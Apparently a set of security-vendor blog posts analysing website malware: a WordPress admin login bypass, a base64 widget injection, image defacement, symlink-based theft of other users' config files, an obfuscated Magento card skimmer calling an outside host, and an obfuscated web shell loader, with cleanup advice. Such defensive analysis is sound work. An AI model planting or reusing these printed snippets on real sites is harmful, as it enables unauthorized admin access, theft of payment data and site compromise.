Author: Yuliyan Tsvetkov

On a daily basis we find different kinds of malware like backdoors, credit card stealers, injected scripts, and phishing pages. While each one of those catches our attention, we recently found an interesting WordPress administration login bypass script.

This technique, login bypass, is often used after the website is compromised because attackers can easily access the post, page, and widget section without spending hours trying different username & password combinations in a brute-force attack, for instance.

The malicious script (theme.php) was injected into the theme structure with the intention of blending in with good code and trying to go undetected.

Here is a snippet of the malware:

require('./../../../../../../../wp-blog-header.php');$query_str = "SELECT ID FROM $wpdb->users";…if (user_can($user_id, 'administrator')) {   …    $user_login = $user_info->user_login;   …    do_action('wp_login', $user_login);       echo "You are logged in as $user_login";       if (function_exists('get_admin_url')) {           wp_redirect(get_admin_url());

The code is very straightforward. First, it includes the wp-blog-header.php file that subsequently loads functions from wp-config.php related to login capabilities.

Secondly, the malware checks if the user_id fetched from the database has administrator privileges -the location of ‘wp-admin’ URL location via ‘get_admin_url()’ function. If all these criterias match, the attacker is then redirected (wp_redirect) to the wp-admin URL with administrator access to the backend without sending any username / password combination.

In these types of attacks, we also noticed that bogus admin users may be created into the backend interface. If you suspect of a compromise, or identify a user with administrator privileges that you haven’t created, we highly recommend taking a backup of your database, removing the user and changing the password for all other users.

As a good security practice, users should have access only to the resources they need to, as WordPress implemented this very well through the different roles a user could have in the backend (Subscriber, Editor, Contributor, Author, Administrator, etc.). Make sure to take advantage of this feature and prevent further damage to your website and online presence.

We also recommend having a File Integrity Monitor in place and a Website Firewall to prevent further issues from happening.

Each and every day the attackers get more clever and exploit new attack vectors. Sucuri Labs recently found a malicious JavaScript hidden in the database of a WordPress website.

The malicious code was injected inside a legit widget of the website:

s:6:"filter";b:1;}i:6;a:3:{s:5:"title";s:0:"";s:4:"text";s:515:"<?php$r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; $h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; $s=base64_decode('PHNjcmlwdCBzcmM9Imh0dHAclVmIj48L3ND4NCg=='); $p = strpos($r, $h); if(($p===false)&&($r<>'')){echo $s;}if(current_user_can('administrator') || current_user_can('editor') || current_user_can('author') || current_user_can('contributor')) {?>

No heavy encoding or obfuscation was used for this attack, just simple base64 encoding. After decoding the strings, we found that it loads malicious JQuery Java script from shorten URL:

<script src="hxxp://g00(.)co/P4YrUf"></script>

That follows to this free JS script hosting website:

hxxp://yourjavascript(.)com/5123133466/jquery-migrate-min-g4.js

which injects spammy iframes inside the widget.

If you think that you are victim of such an attack, check your database for the above encoded strings in base64, update all of your plugins, and check all of your widgets for suspicious activity. You can trust our Security Engineers at https://sucuri.net for checking your website for more malicious code if you are unsure that the infection was cleared.

Website defacement is still a big issue for various website owners. It directly impacts on your online presence / visibility and as a consequence, it may get your website flagged as “Hacked” by different search engines.

Recently, our team found an interesting case where the defacement page was not just an HTML page. This type of defacement used a different technique that made not only its detection harder, but also harder for a search engine to identify such pages as dangerous resources.

As many of you know, images are not applied to the metadata that the search engine find in order to index your website. If you don’t have a file monitoring system in place, you may never be able to identify the issue unless you visit the defaced resource yourself or receive a message from a visitor / client.

The following snippet is an example of the technique being used by attackers:

<html>    <body>       <?php $image_url='url/to/the/defaced/image'; ?>       <img src="<?php echo $image_url;?>">    </body><html>

Beware that attackers may use different techniques to deface a website. This one however,  is hidden from the search engines. An issue may only be detected if you are constantly monitoring your website or have a Website Firewall Protection to prevent this from happening.

If you think that you are victim of an attack and want your website checked, you can rely on the security analyst professionals here at Sucuri.

Recently we found a very interesting malware that injects symbolic links in each and every Linux/UNIX home folder. Once the website is infected, it uses the following code to avoid detection from search engine agents and can be executed only by the attackers:

if (!empty($_SERVER['HTTP_USER_AGENT'])) {    $bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");    if (preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {       header('HTTP/1.0 404 Not Found');       exit;    }}

The malicious code also performs other checks, such as verifying if the OS is Windows (as it may not work on that OS due to filesystem differences) and if the symlink function is enabled on the PHP engine:

if ($_POST["m"] && !$_POST["passwd"] == "") {              $check = @ini_get("disable_functions");       if (eregi("symlink", $check)) {           die("<font color=13B8E6>Symlink is Disbled</font>");       }

If the following conditions are met:

• User Agent is different than search engines;
• OS is Linux/UNIX based;
• PHP engine has the symlink function enabled;

The malware injects another code into .htaccess file in order to change your DirectoryIndex to Sux.html, which usually redirects to a defacement page.

Moreover, the attacker also has the capability of sending different $_POST requests in order to try finding the location of the /etc/passwd file.

$etc_passwd = $_POST["passwd"];$etc_passwd = explode("", $etc_passwd);foreach ($etc_passwd as $passwd) {    $pawd = explode(":", $passwd);    $user = $pawd[0];

This technique is used because if the infected server is sitting in a shared environment and they have write permissions to those other directories, attackers can inject multiple symlinks in different users and get as many database files and sensitive data as they can:

@symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');@symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');@symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');

If you don’t use symlinks, our recommendation would be disabling them altogether - this way the script is ineffective. Also check the /home directory on your hosting for different directories that are not known to you, plus for files and folders that are not part of your website.

If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

Every day we find many Magento credit card stealers injected into different files: modules, core files, themes. Magento database is not an an exception.

For example, this credit card stealer was found in the core_config_data table. The obfuscated database injection begins with the following code:

<script>var _0x7539=["x6Cx6Fx63x61x74x69x6Fx6E","x74x65x73x74","x6Fx6Ex65x70x61x67x65x7Cx63x68x65...x6Fx6Ex65x73x74x65x70x7Cx66x69x72x65x63x68x65x63x6Bx6Fx75x74"...

It loads an external script from js-save .link/js-save/mage.js into pages with payment forms to intercept data entered there.

var _0x7539=["location","test","onepage|checkout|onestep|firecheckout","<script src="https://js-save .link/js-save/mage.js"></script>...

The mage.js code sends intercepted data to the mag.php script on the same malicious js-save .link site.

The injected script has one more part (also encrypted). It prepares the payment form for data theft. Here is the decoded second part of the DB injection:

setInterval(function() {  if (!document.getElementById("payment_form_ccsave")) {     ShowForm("checkout-payment-method-load")   }}, 100);function ShowForm(elem) {  if (document.getElementById(elem)) {        var node = document.getElementById(elem);       while (node.firstChild) {           node.removeChild(node.firstChild)       };              node.insertAdjacentHTML("beforeend", htmlCCForm)  }}

This code checks if the payment form has the “pay with credit card” method. If it is absent, it adds this method (and the corresponding hardcoded HTML form) to the “checkout-payment-method-load" page element and removes all other payment methods to increase chances of victims choosing to enter their credit card details in the form. Once the form is prepared, the script from js-save .link will be able to successfully steal entered data.

This attack a new version of the attacks that previously used the js/lib/ccard.js file to inject similar scripts (usually not obfuscated). Back then they used the jquery-cdn . top and statsdot. eu domains.

Since this attack modifies the payment form, some infected sites may experience problems with payments. If your customers report that payment form won’t work or have strange behavior, it may be a sign of infection and you need to thoroughly check all files and the database. Pay a special attention to files like: app/code/core/Mage/Payment/Model/Method/Cc.php and js/lib/ccard.js, and to the design/head/includes rows of the core_config_data table. You might also want to check the Ecommerce Security section of our blog where we regularly share details of attacks on ecommerce sites.

If your site is hacked and you need help in cleaning it, or you just want it to be regularly monitored for all sorts of security problems, make sure to check our Website AntiVirus service.

Remember the wave of HTML files infection back in 2015 affecting outdated WordPress sites? Now it came back more powerful, with more files uploaded via a PHP backdoor.

We have found large number of created folders in the root folder of a website.

The naming convention of the SPAM files was different from the previous infections, and the uploader backdoor script was located in the wp-content folder.

The obfuscation had this string:

eval(fUUPd("jbvnzvTQep53AAZ8Dhs7BiKFjlmGFYISsAx772QUCKzD3nuQYw8/SY71x95+AWJAcnGVZz...

where fUUPd was a custom decryption function based on gzinflate/base64_decode and character code shift.

function fUUPd($NVAR) { 	$NVAR=gzinflate(base64_decode($NVAR)); 	for($i=0;$i<strlen($NVAR);$i++) { 		$NVAR[$i] = chr(ord($NVAR[$i])-1); 	} 	return $NVAR; }

After decoding, it was easy to recognize the most popular WSO/FilesMan web shell.

The interesting part was the sitemap.xml files in all SPAM folders that clearly speeded up indexing of the malicious pages in popular search engines.

Keep an eye on your Search Console reports and notifications - you may find early signs of the compromise there. Act before it's too late and Google places embarrassing "This site may be hacked" label on your search results. Website security monitoring will help you stay on top of things.